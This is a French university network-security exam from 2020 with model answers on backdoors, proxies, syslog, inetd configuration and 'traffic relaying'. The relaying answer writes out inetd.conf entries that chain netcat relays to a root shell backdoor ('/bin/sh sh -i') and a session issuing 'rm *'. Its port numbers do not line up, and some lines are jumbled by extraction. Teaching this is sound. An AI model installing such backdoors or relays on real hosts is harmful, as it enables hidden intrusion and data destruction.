DS1_2019_2020
Sécurité des Systèmes et des Réseaux
Le 26 Février 2020 à 21H
1- Donner une définition des éléments suivants : Backdoor, Proxy, Vulnérabilité, Syslog
2- Donner une définition d'une attaque ?
3- A quoi servent les fichiers suivants sous UNIX :
- /etc/inetd.conf
- /etc/services
4- Expliquez l'attaque dite traffic relaying ?
5- Expliquez le rôle de la polytique de sécurité dans la sécurité ?
Réponses :
1- Donner une définition des éléments suivants : Backdoor, Proxy, Vulnérabilité, Syslog ?
Backdoor : Un service installé de façon frauduleuse pour être exploité ultérieurement.
Généralement ce service est installé sur un port (/etc/services) non fonctionnel (ports > 1024).
Proxy : C’est un firewall applicatif. Il opère au niveau de la couche 7. Son adresse IP est autorisée
dans la table du firewall.
Publicité
Vulnérabilité : Ce sont les faiblesses intrinsèques d’un système. Elles sont souvent cibles de
l’attaquant pour les exploiter et faire une attaque.
Syslog : C’est le processus responsable d’enregistrer les traces. Sous UNIX il s’appelle
« syslogd ». Il est le seul à enregistrer les log (dans /var).
2- Donner une définition d'une attaque ?
Une attaque est une menace qui exploite une vulnérabilité pour porter atteinte à l’une des
composantes de la sécurité (Confidentialité, Intégrité, Disponibilité) et ce en contournant les
défenses (Firewall, Proxy, IDS, etc.).
3- A quoi servent les fichiers suivants sous UNIX :
- /etc/inetd.conf
- /etc/services
c’est le fichier de configuration de inetd. Il contient les services sous le
/etc/inetd.conf
contrôle de inetd comme (telnetd et ftpd). A partir de ce fichier on peut activer ou désactiver ces
services (telnetd, ftpd, etc.) en enlevant ou en rajoutant le caractère « # » au début du services
concerné.
Publicité
Exemple
telnet
Le service « telnetd » est actif et le service « ftpd » est désactivé.
tcp nowait
stream
root /usr/sbin/in.telnetd in.telnetd
ftp stream
tcp nowait
root /usr/sbin/in.ftpd
in.ftpd
/etc/services
port, met un « # » au début de sa ligne.
c’est le fichier de configuration des ports et les protocoles associés. Pour fermer un
4- Expliquez l'attaque dite traffic relaying ?
C’est une attaque qui permet d’atteindre une cible (victime) en passant par deux ou plusieurs
machines intermédiaires. Ainsi l’attaquant ne laisse pas de trace chez la victime.
Publicité
Exemple :
Relay A
Output-to-input
Ecouteur netcat
victime
Client netcat
Hacker
Relay B
Output-to-input
Dans ce cas, le Hacker dans la machine « Client » a installé un backdoor « Ecouteur de typpe sh
« Shell» chez la machine victime. Il a configuré /etc/inetd.conf de deux machines A et B pour que
sa requête envoyée vers A, sera déroutée vers B. La machine B va dérouter à son tour la requête
du hacker ver la machine de la victime. Une configuration possible de A et B dans /etc/inetd.conf
sera la suivante :
Sur la machine A dont l’adresse IP est 192.168.123.27, la configuration de /etc/inetd.conf est :
11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 192.168.123.28 54321
Publicité
Sur la machine B dont l’adresse IP est 192.168.123.28, la configuration de /etc/inetd.conf est :
54321 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 192.168.123.29 2222
On suppose que la victime dispose de l’adresse IP suivante : « 192.168.123.29 ». La
configuration de /etc/inetd.conf de la machine victime est
12345 stream tcp nowait root /bin/sh sh –i
ET on suppose que le hacker dispose de l’adresse IP suivante : « 192.168.123.26 »
Une opération telnet sur la machine du hacker est envisageable comme suit :
C:\ telnet 192.168.123.27 11111
rm *
^d
5- Expliquez le rôle de la politique de sécurité dans la sécurité ?
Une politique de sécurité c’est l’ensemble des mesures permettant de sécuriser le système. Ces
mesures se traduisent par actions, des directives et des configurations sur les dispositifs (Firewall,
Proxy, etc.). Parmi ces mesures on trouve les règles dans la table du firewall.